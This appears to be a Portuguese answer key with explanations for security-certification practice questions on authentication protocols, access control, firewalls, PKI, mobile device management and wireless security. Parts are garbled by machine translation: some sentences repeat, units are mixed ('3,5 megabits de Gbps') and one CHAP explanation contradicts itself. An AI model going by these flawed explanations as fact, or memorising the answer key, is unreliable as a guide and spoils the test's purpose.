. SAML, a Security Assertion Markup Language, é usada por muitos provedores de identidade para Troque dados de autorização e autenticação com provedores de serviços. Kerberos e LDAP (Lightweight Directory Access Protocol) são usados dentro de muitas organizações, mas Fred encontrar mais sucesso com SAML para serviços Web populares. Nova Tecnologia LAN Manager (NTLM) permanece em uso para sistemas Windows, mas Kerberos é mais comumente usado para domínios modernos do Windows e não seria usado no cenário descrito.
. Os três canais que não se sobrepõem são 1, 6 e 11. Os demais canais serão sobrepor. Em uma instalação ideal, esses três canais podem ser usados para maximizar o rendimento e minimizar a interferência.
A resposta correta é que o Kerberos usa vários tickets, cada um com um limite de tempo. Os bilhetes de serviço normalmente só são válidos por 5 minutos ou menos. Isso significa que se a Rede O protocolo NTP (Time Protocol) está falhando, tíquetes válidos podem parecer ter expirado.
A resposta correta é que o CHAP (Challenge Handshake Authentication Protocol) periodicamente faz com que o cliente se autentique novamente. Isso é transparente para o usuário, mas é feito especificamente
para evitar o sequestro de sessão. O Protocolo de Autenticação de Senha (PAP) é, na verdade, bastante antigo e não se autentica novamente. Na verdade, ele até envia a senha em texto não criptografado, então não deve ser usado por mais tempo. SPAP (Shiva Password Authentication Protocol) adiciona criptografia de senha ao PAP, mas não autentica novamente. OAuth é usado na autenticação da Web e não reautenticar
Um firewall de software é mais adequado para implantações em máquinas individuais, particularmente
quando os sistemas de endpoint estão sendo protegidos. Normalmente,os firewalls de hardware são implantados para proteger segmentos de rede ou grupos de sistemas e resultar em despesas adicionais e gestão. Firewalls virtuais e na nuvem são mais frequentemente implantados em datacenters onde
Ambientes virtuais ou de nuvem estão em uso, embora um firewall virtual possa ser executado em um Extremidade.
Dessas versões do EAP (Extensible Authentication Protocol), somente o LEAP (Lightweight Extensible Authentication Protocol) não oferece suporte a TLS. Camada de transporte tunelada EAP A segurança (EAP-TTLS) na verdade estende o TLS, mas oferece suporte ao protocolo subjacente. Protegido PEAP (Extensible Authentication Protocol) encapsula o EAP em um TLS criptografado túnel
O jailbreak permite que os usuários adicionem software a um iPhone que normalmente não é permitido, incluindo aplicativos de terceiros, alterando configurações do sistema, temas ou aplicativos padrão.
O controle de acesso obrigatório (MAC) é a solução correta. Não permitirá baixar usuários privilegiados para até mesmo ver os dados em um nível de privilégio mais alto. Controle de acesso discricionário (DAC) faz com que cada proprietário de dados configure sua própria segurança. Controle de acesso baseado em função (RBAC) poderia ser configurado para atender às necessidades, mas não é a melhor solução para estes Requisitos. SAML (Security Assertion Markup Language) não é um modo de controle de acesso.
O CYOD, ou escolha seu próprio dispositivo, permite que os usuários escolham um dispositivo corporativo possuído e pago. As opções podem ser limitadas ao conjunto de dispositivos ou os usuários podem ter permissão para Escolha essencialmente qualquer dispositivo, dependendo das decisões de implantação da organização. BYOD permite que os usuários tragam seu próprio dispositivo, enquanto o COPE, ou propriedade corporativa, pessoalmente habilitado, fornece dispositivos aos usuários que eles podem usar para uso pessoal. VDI usa um virtual Infraestrutura de desktop como uma camada de acesso para qualquer acesso para qualquer modelo de segurança onde necessidades especializadas ou Os requisitos de segurança podem exigir acesso à Área de Trabalho Remota ou aos serviços de aplicativos.
O elemento-chave aqui é que as autoridades de certificação (CA) estão operando em uma malha, o que significa que nenhuma autoridade de certificação é a autoridade de certificação raiz e que cada uma deve confiar nas outras. Para isso, Derek primeiro precisa emitir certificados de D para cada um dos outros Cas e, em seguida, ter o outros emitem D um certificado. Chaves privadas nunca devem ser trocadas, e é claro se ele apenas tem os outros sistemas emitirem certificados D, eles não reconhecerão seu servidor.
. Se Claire estiver usando o Simple Network Management Protocol (SNMP) para gerenciar e monitorar seus dispositivos de rede, ela deve certificar-se de que está usando SNMPv3 e que está corretamente configurado. SNMPv3 pode fornecer informações sobre o status e configuração dela dispositivos de rede. O Remote Authentication Dial-In User Service (RADIUS) pode ser usado para autenticar na rede, mas Transport Layer Security (TLS) e SSH File Transfer Protocol (SFTP) não são usados especificamente para os fins descritos
A conteinerização permitirá que as ferramentas e os dados da empresa de Eric sejam executados dentro de um contêiner baseado em aplicativo, isolando os dados e programas do bring autocontrolado seus próprios dispositivos (BYOD). A segmentação de armazenamento pode ser útil, mas a operação O próprio sistema, bem como as aplicações, continuariam a ser uma preocupação. Érico deve recomendar criptografia de dispositivo completo (FDE) como uma prática recomendada de segurança, mas criptografando o contêiner e o Os dados que ele contém podem fornecer uma segurança razoável
O Kerberos não envia a senha dos usuários pela rede. Quando o nome do usuário é enviado ao serviço de autenticação, o serviço recupera o hash da senha do usuário de o banco de dados e, em seguida, usa isso como uma chave para criptografar dados a serem enviados de volta ao usuário. O A máquina do usuário pega a senha que o usuário digitou, faz hash e a usa como um para descriptografar o que foi enviado de volta pelo servidor. O Challenge Handshake Authentication Protocol (CHAP) envia a senha do usuário em um O CHAP (Challenge Handshake Authentication Protocol) envia a senha do usuário de forma criptografada. RBAC é um controle de acesso modelo, não um protocolo de autenticação. A autenticação tipo II é algo que você tem, como como chave ou cartão.
Os certificados EV, ou validação estendida, provam que o certificado X.509 foi emitido à pessoa jurídica correta. Além disso, apenas autoridades de certificação (CAs) específicas podem emitir Certificados EV. Os certificados validados por domínio exigem prova de que você tem controle do domínio, como definir o registro TXT DNS ou responder a um email enviado a um contato em o registro Whois do domínio. Um certificado de validação organizacional requer um domínio validação e prova adicional de que d prova adicional de que a organização é uma pessoa jurídica.
As redes Wi-Fi 5 podem fornecer taxa de transferência teórica de até 3,5 megabits de Gbps por segundo, embora padrões mais recentes, como o Wi-Fi 6, continuem a aumentar isso. O próximo mais rápido o padrão sem fio listado é o celular LTE com taxas de transferência teóricas em torno de 50 megabits por segundo. Quando a largura de banda é importante, o Wi-Fi tende a vencer, embora o celular 5G redes em condições ideais podem rivalizar com o Wi-Fi.
O custo dos aplicativos e a qualidade da implementação de segurança podem variar de acordo com no fornecedor e no produto, mas as soluções de segurança nativas da nuvem geralmente terão melhores e uma integração mais profunda na plataforma de nuvem do que as soluções de terceiros. A diversidade de fornecedores em projetos ainda pode impulsionar outras escolhas, mas essas são decisões de design conscientes.
OAuth (Open Authorization) é um padrão aberto para autenticação baseada em token e autorização na Internet e permite que as informações da conta de um usuário final sejam usadas por serviços de terceiros, sem expor a senha do usuário. Kerberos é um protocolo de autenticação de rede e não é usado para autenticação entre domínios/serviços. Declaração de segurança Markup Language (SAML) é um formato de dados padrão aberto baseado em XML para troca dados de autenticação e autorização entre as partes. OpenID é OpenID é um serviço de autenticação muitas vezes fornecido por terceiros, e pode ser usado para entrar em qualquer site que aceite OpenID. Seria possível que isso funcionasse, mas apenas com sites que suportam OpenID, por isso não é uma solução tão boa quanto o Oauth.
A persistência de sessão garante que todo o tráfego de um cliente para uma transação ou sessão vai para o mesmo servidor ou serviço.
As ferramentas de prevenção de perda de dados (DLP) permitem que dados confidenciais sejam marcados e monitorados para que que se um usuário tentar enviá-lo, ele será notificado, os administradores serão informados, e Se necessário, os dados podem ser protegidos usando criptografia ou outros métodos de proteção antes ele é enviado. A criptografia de disco completo (FDE) protegeria os dados em repouso e S/MIME e POP3S protegeria os e-mails que estão sendo recuperados de um servidor, mas não impediria que os SSNs sendo enviado.
Embora os fornecedores de infraestrutura como serviço (IaaS) geralmente forneçam forte suporte para disponibilidade, incluindo replicação para várias zonas geográficas ou regiões, bem como armazenamento confiável e seguro, eles não permitem acesso direto ao hardware subjacente em na maioria dos casos. Se Jennifer precisar de acesso direto ao hardware, ela precisará implantar em um datacenter onde ela pode reter o acesso aos servidores físicos.
O gerenciamento fora de banda (OOB) usa interfaces de gerenciamento separadas, conforme mostrado. um método de conectividade diferente da conexão normalpara fornecer um meios de gestão de sistemas. Uma DMZ, ou zona desmilitarizada, é uma zona de segurança que normalmente está exposta ao mundo e, portanto, é menos confiável e mais exposta. Gerenciamento em banda usa protocolos comuns como Secure Shell (SSH) ou HTTPS para gerenciar dispositivos por meio de seusinterfaces normais ou conexões de rede.
A garantia de chave fornece chaves de criptografia a terceiros para que elas possam ser liberadas para um parte apropriada se determinadas condições forem atendidas. Embora isso signifique que as chaves estão fora do controle do proprietário ou responsável, em muitos casos a necessidade de ter uma maneira recuperável ou acessível para chegar às chaves se sobrepõe à exigência de manter as chaves em um mãos de um único indivíduo ou organização. As opções restantes foram inventadas, mas você pode encontrar o termo "recuperação de chave", que é que é um processo em que a aplicação da lei ou outro As partes podem recuperar chaves quando necessário usando um processo que lhes forneça um acesso chave ou chave de descriptografia que pode não ser a mesma chave usada pelo original usuário de criptografia.
O atestado de inicialização requer que os sistemas rastreiem e meçam o processo de inicialização e, em seguida, atestar a um sistema que o processo foi seguro. Inicialização segura, que é um conceito relacionado, permite que apenas software confiável seja executado usando valores hash anteriores para garantir o processo é seguro. BOOTP e BIOS não estão envolvidos neste processo, em vez disso, Unified Extensible O firmware UEFI (Firmware Interface) suporta inicialização segura e atestado de inicialização.
A resposta correta é que o OpenID é um serviço de autenticação geralmente feito por um terceiro party, e pode ser usado para entrar em qualquer site que aceite OpenID. Kerberos é um protocolo de autenticação de rede para uso dentro de um domínio. Nova Tecnologia LAN Manager (NTLM) é um protocolo de autenticação do Windows mais antigo. Shibboleth é um sistema de logon único, mas funciona com sistemas federados.
. Desabilitar o acesso remoto ao Registro para sistemas que não o exigem pode impedir o acesso remoto modificação e leituras do registro. Esta é uma prática recomendada sempre que possível, Mas alguns sistemas podem exigir acesso remoto ao Registro por gerenciamento ou outros motivos. O O registro do Windows não é corrigido de forma independente, o registro precisa ser legível e gravável para ter um sistema Windows funcional e não há nenhum modo que criptografe chaves de usuário.
Maximizar a sobreposição de cobertura causaria maior contenção entre pontos de acesso.Em vez disso, as instalações devem minimizar a sobreposição sem deixar pontos mortos em áreas importantes.áreas. Realizando uma pesquisa no local, controlando os níveis de potência e ajustando-os para minimizarA contenção e o projeto em torno dos materiais de construção de um edifício são partes importantes do projeto do layout físico e da colocação dos WAPs. Felizmente, modernoAs redes sem fio empresariais possuem recursos inteligentes avançados que ajudam a realizar muitas dessas tarefas. as coisas um tanto automaticamente.
O controle de acesso baseado em atributos (ABAC) analisa um grupo de atributos, além donome de usuário e senha de login, para tomar decisões sobre conceder ou não acesso. Udos atributos examinados é a localização da pessoa. Como os usuários desta empresaviajam com frequência, muitas vezes estarão em novos locais, e isso pode fazer com que o ABAC rejeitseus logins. Senhas erradas certamente podem impedir o login, mas não são específicas do ABAC. O ABAC não impede o acesso remoto e um firewall pode ser configurado para permitir ou proibir qualquer tráfego que você desejar.
. O controle de acesso baseado em regras aplica um conjunto de regras a uma solicitação de acesso. Com base na aplicação das regras, o usuário pode ter acesso a um recurso específico que não tinha. permissão explicitamente concedida para. MAC, DAC e controle de acesso baseado em função não dariam acesso do usuário, a menos que esse usuário já tenha recebido explicitamente esse acesso
Necessidades de segmentação entre vários datacenters virtuais em nuvem, o custo de operação do serviço de firewall e a visibilidade do tráfego fornecido pelo provedor de serviços em nuvem são todos elementos de design que Ed precisará considerar. Ele não precisará, no entanto, se preocupar com hardware acesso para atualizações. Em vez disso, é provável que ele use um dispositivo de nuvem virtual ou uma funcionalidade de firewall integrada fornecida pelo provedor de serviços de infraestrutura em nuvem.
Esta questão descreve um firewall sem estado, que analisa cada pacote para fazer decisões sobre o que será permitido através dele. Os firewalls com estado prestam atenção às conversas e permitem a passagem de pacotes em uma conversa entre dispositivos, uma vez que tenham sido transmitidos. verificou a troca inicial. Os firewalls de próxima geração (NGFWs) são construídos em uma ampla variedade de serviços de segurança. Os firewalls da camada de aplicação entendem os aplicativos que são executados através deles e fornecer recursos mais profundos de análise de pacotes para bloquear tráfego indesejado da camada de aplicativos
Módulos de segurança de hardware estão disponíveis como cartões inteligentes, cartões microSD e pen USB unidades, além de sua implantação frequente como dispositivos para uso empresarial. Nancy poderia adquirir um HSM baseado em cartão MicroSD certificado e testado que protegeria suas chaves em uma maneira segura. Uma infra-estrutura de chave pública (PKI) baseada em aplicações não forneceria a mesmo nível de segurança na maioria dos dispositivos móveis sem hardware especialmente projetado, o que não é mencionado neste problema. OPAL é um padrão de criptografia baseado em hardware e não não fornece gerenciamento de chaves, e uma autoridade de certificação (CA) off-line não ajudaria em esta circunstância.
Os sistemas de arquivos Windows e Linux funcionam com base em um controle de acesso discricionário esquema onde proprietários de arquivos e diretórios podem determinar quem pode acessar, alterar ou de outra forma trabalhar com arquivos sob seu controle. Sistemas de controle de acesso baseados em funções determinam direitos com base nas funções atribuídas aos usuários. Os sistemas de controle de acesso baseados em regras usam uma série de regras para determinar quais ações podem ocorrer, e sistemas de controle de acesso obrigatórios impõem controle no nível do sistema operacional.
Habilitar o controle de tempestade em um switch limitará a quantidade total de largura de banda que os pacotes de transmissão podem usar, evitando que tempestades de transmissão destruam a rede. Bloqueio O Protocolo de Resolução de Endereço (ARP) impediria que os sistemas se encontrassem, e bloquear todos os pacotes de transmissão também bloquearia muitos recursos importantes da rede.
Uma auditoria de permissões descobrirá quais permissões cada usuário possui e comparará isso com suas requisitos do trabalho. Auditorias de permissão devem ser realizadas periodicamente. Rotação de trabalho, no entanto benéfico por outras razões de segurança, irá na verdade agravar este problema
. O modo Pessoal do WPA3 substitui o modo de chave pré-compartilhada encontrado no WPA2 pela autenticação simultânea de iguais. Isso torna mais difíceis os ataques de senhas ou senhas fracas conduzir e permite maior segurança quando os dispositivos estão conduzindo sua chave inicial intercâmbio. WEP, WPA e WPA2 não implementam SAE.
Esta imagem mostra um proxy de encaminhamento, que pode ser usado para aplicar políticas a solicitações de usuáriosenviados para servidores web e outros serviços. Os proxies reversos atuam como gateways entre usuários eservidores de aplicativos, permitindo cache de conteúdo e manipulação de tráfego. Eles são frequentemente usados por redes de entrega de conteúdo para ajudar no gerenciamento de tráfego.
O controle de acesso discricionário(DAC) permite que os proprietários dos dados atribuam permissões. O controle de acesso baseado em função (RBAC) atribui acesso com base na função em que o usuário ocupa. o controle de acesso (MAC) é mais rigoroso e impõe controle no nível do sistema operacional. Caso de atributo controle de acesso (ABAC) considera vários atributos como localização, hora e computador em além de nome de usuário e senha
O Secure Lightweight Directory Access Protocol (LDAPS) usa a porta 636 por padrão. DNS usa a porta 53, o LDAP usa a 389 e o HTTP seguro usa a porta 443
A melhor resposta para as necessidades que Chris identificou é um módulo de segurança de hardware, ou HSM. Os HSMs podem atuar como gerenciadores de chaves criptográficas, incluindo criação, armazenamento e manipular com segurança chaves e certificados de criptografia. Eles também podem atuar como criptografia aceleradores, ajudando a descarregar funções de criptografia como Transport Layer Security (TLS) criptografia. Um TPM (Trusted Platform Module) é um dispositivo usado para armazenar chaves de um sistema mas não descarrega o processamento de criptografia e é usado para chaves em um sistema específico, em vez de do que usos mais amplos. CPUs e GPUs podem ter funções de aceleração criptográfica, mas não armazene ou gerencie com segurança certificados e outros artefatos de criptografia.
Um sistema de prevenção de invasões baseado em host (HIPS) pode monitorar o tráfego de rede para identificar ataques, comportamentos suspeitos e padrões maliciosos conhecidos usando assinaturas. Um firewall interrompe o tráfego com base em regras; ferramentas antimalware são projetadas especificamente para impedir malware, não ataques e comportamento de rede suspeito; e um sistema de detecção de intrusão baseado em host (HIDS) só pode detectar, e não impedir, esses comportamentos
. O controle de acesso baseado em função (RBAC) concede permissões com base na posição do usuário dentro a organização. O controle de acesso obrigatório (MAC) usa classificações de segurança para conceder permissões. O controle de acesso discricionário (DAC) permite que os proprietários dos dados definam permissões. O controle de acesso baseado em atributos (ABAC) considera vários atributos como localização, hora, e computador, além de nome de usuário e senha
A inicialização medida fornece uma forma de atestado de inicialização que registra informações sobre cada componente carregado durante o processo de inicialização. Esta informação pode então ser comunicada a um servidor para validação. A inicialização confiável valida cada componente em relação a uma assinatura conhecida. A inicialização medida não se importa com o tempo de inicialização, nem atualiza o sistema Interface de firmware extensível unificada (UEFI)
3. D. O centro de distribuição de chaves (KDC) emite ingressos. Os tickets são gerados pelo serviço de concessão de ingressos, que geralmente faz parte do KDC. O serviço de autenticação simplesmente autentica o usuário, os certificados X.509 e as autoridades de certificação não fazem parte do Kerberos, e o serviço de concessão de ingressos gera o ingresso, mas o KDC o emite
Embora a aplicação de patches nos dispositivos seja importante, a maneira mais eficaz de proteger os dispositivos contra ser atacado por força bruta de conta administrativa é colocar os dispositivos em uma LAN virtual de gerenciamento (VLAN) separada e, em seguida, controlar o acesso a essa VLAN. Isso vai impedir que a maioria dos invasores consiga se conectar às interfaces administrativas do dispositivo. Desabilitar o acesso administrativo pode não ser possível e, mesmo que fosse, criaria problemas significativos quando os dispositivos precisavam de alterações.
Enquanto o gerenciamento de dispositivos móveis (MDM) e o gerenciamento unificado de endpoints (UEM) ferramentas fornecem muitos recursos, o status de desbloqueio da operadora normalmente precisa ser verificado com o operadora se desejar validar telefones de propriedade corporativa sem verificar manualmente cada um dispositivo
. Os certificados digitais utilizam o padrão X.509 (ou padrão PGP) e permitem ao usuário assinar digitalmente solicitações de autenticação. OAuth permite que as informações da conta de um usuário final sejam ser utilizados por serviços de terceiros, sem expor a senha do usuário. Não usa digital certificados ou suporte à assinatura digital. Kerberos não usa certificados digitais, nem suporte à assinatura digital. Os cartões inteligentes podem conter certificados digitais, mas não necessariamente tem que tê-los.
C. SAML (Security Assertion Markup Language) é uma linguagem de marcação extensível Estrutura (XML) para criação e troca de informações de segurança entre parceiros on-line. A integridade dos usuários é o ponto fraco na cadeia de identidade SAML. Para mitigar isso risco, os sistemas SAML precisam usar sessões cronometradas, HTTPS e SSL/TLS. LDAP (leve Directory Access Protocol) é um protocolo que permite ao usuário localizar indivíduos e outros recursos como arquivos e dispositivos em uma rede. Controle de acesso do controlador de acesso ao terminal System Plus (TACACS+) é um protocolo usado para controlar o acesso às redes. TACACS+ fornece autenticação e autorização além de contabilização de acesso solicitações em um banco de dados central. A confiança transitiva é um relacionamento bidirecional criado automaticamente entre um domínio pai e um domínio filho em um Microsoft Active Directory. (DE ANÚNCIOS) floresta. Ele compartilha recursos com seu domínio pai por padrão e permite que um usuário autenticado acesse recursos nos domínios filho e pai.
C. UEM, ou gerenciamento unificado de endpoints, gerencia desktops, laptops, dispositivos móveis, impressoras e outros tipos de dispositivos. As ferramentas de gerenciamento de dispositivos móveis (MDM) concentram-se em dispositivos móveis
. B. Os firewalls baseados em host são o primeiro passo na maioria dos projetos de proteção contra ameaças transmitidas pela rede. Eles podem impedir que tráfego indesejado entre ou saia do host, deixando menos tráfego para um sistema de prevenção de intrusões baseado em host (HIPS) ou outras ferramentas analisarem. A criptografia de disco completo (FDE) não impedirá ameaças transmitidas pela rede, e o antivírus se concentra em prevenção de malware, e não de ameaças à rede, como negação de serviço ou exploração de serviços vulneráveis.
Os grupos de segurança são um firewall virtual para instâncias, permitindo que regras sejam aplicadas ao tráfego entre instâncias. A alocação dinâmica de recursos é um conceito que permite que os recursos sejam aplicados conforme necessário, incluindo a ampliação e redução de infraestrutura e sistemas no voar. Endpoints de nuvem privada virtual (VPC) são uma maneira de se conectar a serviços dentro de uma nuvem provedor sem gateway de Internet. Finalmente, o reconhecimento de instância é um conceito que significa que as ferramentas conheçam as diferenças entre as instâncias, em vez de tratar cada instância em um grupo de escala como o mesmo. Isso pode ser importante durante os processos de resposta a incidentes e monitoramento de segurança para grupos dimensionados, onde os recursos podem parecer todos idênticos sem consciência da instância.
Embora as ferramentas de atualização integradas possam lidar com o sistema operacional, software adicional instalados nos sistemas precisam ser corrigidos separadamente. Software e firmware de terceiros, incluindo a Unified Extensible Firmware Interface (UEFI) ou BIOS dos sistemas que são implantados na organização de Derek, precisarão de atualizações regulares. Muitas organizações adotam plataformas de gerenciamento de patches ou plataformas de gerenciamento de sistema com recursos de patch para garantir que isso ocorra de forma mais ampla do que apenas patches de sistema operacional
Se o sistema mantiver um histórico de senha, isso impediria qualquer usuário de reutilizar um Senha Antiga. A complexidade e o comprimento da senha são configurações de segurança comuns,mas não seriam evitar o comportamento descrito. A autenticação multifator ajuda a prevenir ataques de força bruta e reduz o impacto potencial de senhas roubadas, mas não ajudaria neste cenário
A proteção da Bridge Protocol Data Unit, ou BDPU, protege a infraestrutura da rede, impedindo que dispositivos desconhecidos participem da spanning tree. Isso evita que um novo switch seja adicionado impedir um usuário de alegar ser a ponte raiz (neste caso, o Switch C), o que normalmente causaria uma mudança de topologia e o tráfego seria enviado para o Switch X, um resultado indesejável. 802.11n é um protocolo sem fio.
. Um cenário como o acesso Wi-Fi de convidado não fornece aos logins qualquer acesso a recursos corporativos. As pessoas que fazem login apenas conseguem acessar a Internet. Isso representa risco de segurança muito limitado para a rede corporativa e, portanto, muitas vezes é feito com um ou conta compartilhada. O pessoal de suporte técnico geralmente tem acesso significativo a informações corporativas recursos de rede. Embora este seja um cenário de acesso relativamente baixo, ainda é importante saber qual aluno específico está fazendo logon e acessando quais recursos. Qualquer nível de acesso para recursos corporativos deve ter sua própria conta de login individual
As cadeias de certificados listam certificados e certificados de autoridade de certificação (CA), permitindo aqueles que recebem o certificado para validar que os certificados são confiáveis. Um inválido, ou quebrada, cadeia significa que o usuário ou sistema que está verificando o encadeamento do certificado não deve confiar no sistema e no certificado
O Simple Network Management Protocol (SNMP) daria ao invasor uma grande quantidade de informações sobre sua rede. O SNMP não deve ser exposto a redes desprotegidas, O SNMPv3 deve ser implementado e as melhores práticas de segurança do SNMP devem ser seguidas. Tanto POP3 quanto IMAP são protocolos de acesso de e-mail, e o protocolo Dynamic Host Configuration Pro (DHCP) é usado para distribuir endereços IP dinâmicos
. As contas devem ser bloqueadas após um pequeno número de tentativas de login. Três é comum número de tentativas antes que a conta seja bloqueada. Isso impede que alguém simplesmente tentando suposições aleatórias. A antiguidade da senha forçará os usuários a alterar suas senhas, mas não afetará a adivinhação da senha. Senhas mais longas seriam mais difíceis de adivinhar, mas esta opção não é tão eficaz quanto as políticas de bloqueio de conta. A auditoria de uso da conta não terá nenhum efeito nesse assunto.
. Security Assertion Markup Language (SAML) é um formato padrão aberto baseado em XML para troca de dados de autenticação e autorização entre as partes. OAuth permite um fim informações da conta do usuário para serem usadas por serviços de terceiros, sem expor os dados do usuário senha. RADIUS é um protocolo de acesso remoto. O Gerenciador de LAN de Nova Tecnologia (NTLM) é não baseado em XML.
A. O Challenge Handshake Authentication Protocol (CHAP) foi projetado especificamente para este propósito. Ele é autenticado periodicamente, evitando assim o sequestro de sessão. Nenhuma senha O Protocolo de Autenticação (PAP) nem o TACACS+ evitam o sequestro de sessão, e o RADIUS é um protocolo para acesso remoto, não autenticação.
. As redes privadas virtuais (VPNs) IPSec podem fazer com que um local remoto pareça estar conectado à sua rede local. Como Greg precisa contar com uma câmera de segurança de streaming, uma VPN IPSec sempre ativa é a melhor solução listada. VPNs TLS (SSL) são usadas principalmente para aplicativos específicos, normalmente com foco em aplicativos da web
A especificação de armazenamento Opal define como proteger a confidencialidade dos dados armazenados do usuário e como os dispositivos de armazenamento dos fabricantes de dispositivos de armazenamento podem trabalhar juntos. OPAL faz não especificar detalhes ou processos para licenças, contas e bibliotecas ou desmagnetizadores
. O UEFI Secure Boot verifica cada binário carregado durante a inicialização para garantir que seu hash é válido, verificando um certificado confiável localmente ou uma soma de verificação em um lista de permissões. Ele não protege contra worms que possam atacar esses binários, nem verifique diretamente a versão do BIOS do sistema.
B. OpenID Connect funciona com o protocolo OAuth 2.0 e oferece suporte a vários clientes, incluindo clientes baseados na web e móveis. OpenID Connect também oferece suporte a REST. Shibbo leth é uma solução de middleware para autenticação e gerenciamento de identidade que usa SAML (Security Assertion Markup Language) e funciona na Internet. RADIUS é um controle remoto protocolo de acesso. OAuth permite que as informações da conta de um usuário final sejam usadas por terceiros serviços, sem expor a senha do usuário.
C. 04. B. Um Trusted Platform Module, ou TPM, é usado como base para uma raiz de hardware de confiança para PCs modernos. O TPM pode fornecer uma chave criptográfica; um PUF, ou fisicamente função não clonável; ou um número de série exclusivo do dispositivo. A CPU e o disco rígido unidade não são usados para esta função e HSMs, ou módulos de segurança de hardware, são usados para infraestrutura de chave pública (PKI) e para fins criptográficos, mas não como raiz de hardware de confiança para PCs
. C. Os firewalls de próxima geração normalmente incorporam recursos avançados, como filtragem de URL, lista negra e outros recursos da camada de aplicação além da simples filtragem de pacotes ou inspeção de estado completo de pacotes.
D. As ferramentas de gerenciamento de aplicativos móveis (MAM) são projetadas especificamente para essa finalidade, e permitem que aplicativos sejam entregues, removidos e gerenciados em dispositivos móveis dispositivos. MOM é o Microsoft Operations Manager, uma ferramenta de gerenciamento de sistemas que A Microsoft substituiu o Operations Manager em uso atual. MLM geralmente significa marketing multinível ou esquemas de pirâmide – não um termo de segurança. MIM não é um termo de segurança.
. VPNs de túnel dividido enviam apenas tráfego destinado à rede remota pela VPN, com todo o outro tráfego é dividido para usar o sistema VPN ou a conexão de rede primária do usuário. Isto reduz o tráfego global enviado através da VPN, mas significa que o tráfego não pode ser monitorizado e protegido através da VPN. Half-pipe não é um termo de segurança e horizonte dividido é mais frequentemente usado para descrever DNS onde uma visão de DNS interna e externa pode ser diferente.
. A proteção de loop procura exatamente esse tipo de problema. A proteção de loop envia pacotes que incluem uma PDU ou unidade de dados de protocolo. Eles são detectados por outros dispositivos de rede e permitir que os dispositivos de rede desliguem as portas das quais recebem esses pacotes. O opções restantes foram feitas para esta questão
As atualizações over-the-air (OTA) são usadas pelas operadoras de celular e também pelos fabricantes de telefones para fornecer atualizações de firmware e dados atualizados de configuração do telefone. Dispositivo móvel ferramentas de gerenciamento (MDM) podem ser usadas para monitorar a versão atual do firmware e configurações do telefone e permitirá que Charles determine se os telefones que sua equipe usa são atualizado para garantir a segurança. Um agente de controle de acesso à rede (NAC) pode capturar alguns dos esses dados, mas apenas para telefones conectados à rede, o que não abrangerá telefones externos, aqueles com Wi-Fi desligado ou dispositivos remotos. OTA não é especificamente uma forma de atualizar chaves de criptografia, embora o firmware ou as configurações possam incluí-las. OTA não é enviado pelo os próprios telefones
C. PSK pessoal substituído por WPA3, ou chaves pré-compartilhadas, por SAE, ou autenticação simultânea de iguais. SAE ajuda a prevenir ataques de força bruta contra chaves, fazendo com que os invasores interagir com a rede antes de cada tentativa de autenticação.Isso retarda a força bruta ataques. WPA3 também inclui um modo de criptografia de 192 bits. Ele não substitui a criptografia de 64 bits pela criptografia de 128 bits, não adiciona segurança por canal nem adiciona negação de serviço distribuída. (DDoS) monitoramento e prevenção.
Security Enhanced Linux (SELinux) permite controle de acesso obrigatório para servidores baseados em Linux sistemas, e SEAndroid é uma implementação Android do SELinux. Isso significa que Isaque pode usar o SEAndroid para atingir seus objetivos. O Android usa um registro, mas não há Modo MAC. O MACDroid foi criado para esta questão, e o modo de usuário único não faça do Android um sistema baseado em MAC
B. O sistema descrito é um sistema de gerenciamento de acesso privilegiado (PAM). Os sistemas PAM são usado para gerenciar e controlar contas privilegiadas com segurança. MAC é um esquema de controle de acesso que impõe acesso no nível do sistema operacional. FDE é criptografia de disco completo e TLS é camada de transporte Segurança
. A. Usando uma ferramenta de gerenciamento de dispositivos móveis (MDM) que permite o controle dos dispositivos permitiria que Alaina bloqueasse as câmeras, impedindo que os funcionários usassem o Tablets Android para tirar fotos. Ela ainda precisaria garantir que sua equipe não trouxesse seus próprios dispositivos equipados com câmera nas instalações. DLP é prevenção contra perda de dados, OPAL é um padrão de criptografia para unidades, e MMC tem vários significados, incluindo multimídia cartões e snap-ins do Microsoft Management Console para sistemas Windows, nenhum dos quais forneceria o controle que ela precisa.
7. C. Uma ferramenta de gerenciamento universal de endpoints (UEM) pode gerenciar desktops, laptops, dispositivos móveis dispositivos, impressoras e outros dispositivos. As ferramentas UEM geralmente usam aplicativos implantados em dispositivos móveis dispositivos para configurá-los e gerenciá-los, e a melhor opção de Olivia nesta lista é uma ferramenta UEM. Um CASB é um corretor de segurança de acesso à nuvem e não é usado para gerenciar dispositivos móveis, e o outras opções exigem muito trabalho manual e provavelmente não terão sucesso – ou os usuários simplesmente alterarão as configurações quando for conveniente para eles.
Gateways web seguros (SWG) de próxima geração (NG) adicionam recursos adicionais além daqueles encontrado em corretores de segurança de acesso à nuvem e firewalls de próxima geração. Embora os recursos possam variam, eles podem incluir filtragem da web, descriptografia TLS para permitir análise de tráfego e recursos avançados proteção contra ameaças, recursos de corretor de segurança de acesso à nuvem (CASB), prevenção contra perda de dados (DLP), e outros recursos avançados. Este tipo de solução é relativamente novo e o o mercado está mudando rapidamente
B. Representações numéricas de permissões de arquivo são comumente usadas em vez de rwx notação com chmod. Um 7 define permissões completas e o primeiro número define os direitos do usuário, o que significa que aqui o usuário terá acesso total ao arquivo.
B. A fixação de certificado associa um certificado conhecido a um host e depois o compara certificado conhecido pelo certificado que é apresentado. Isso pode ajudar a evitar ataques man-in-the-middle, mas pode falhar se o certificado for atualizado e o certificado fixado não. A CRL, ou lista de revogação de certificados, mostraria se o certificado foi revogado, mas não apareceria se fosse alterado. Patrick não terá acesso ao servidor remoto chave privada, a menos que ele seja o administrador
2. C. Privacy Enhanced Mail (PEM) é o formato mais comum emitido pelas autoridades de certificação. O formato Distinguished Encoding Rules (DER) é uma forma binária do texto ASCII PEM formatar. O formato PKCS#7 ou P7B é Base64 ASCII e o formato PKCS#12, ou PFX, é binário formato usado para armazenar certificados de servidor, certificados intermediários e chaves privadas em um único arquivo.
. Alterar os endereços IP associados a um domínio para um valor arbitrário pode causar roteamento ou outros problemas. Isso significa que alterar o endereço IP não seria uma escolha método de validação de um domínio. As restantes opções são meios legítimos e normais de validação para certificados.
A. Este diagrama mostra um proxy reverso. Um proxy reverso obtém conexões externas world e os envia para um servidor interno. Um proxy de encaminhamento utiliza conexões internas e os envia para servidores externos. Os proxies round-robin e de próxima geração não são tipos de proxies, embora o round-robin seja uma forma de balanceamento de carga.
Governança e compliance:
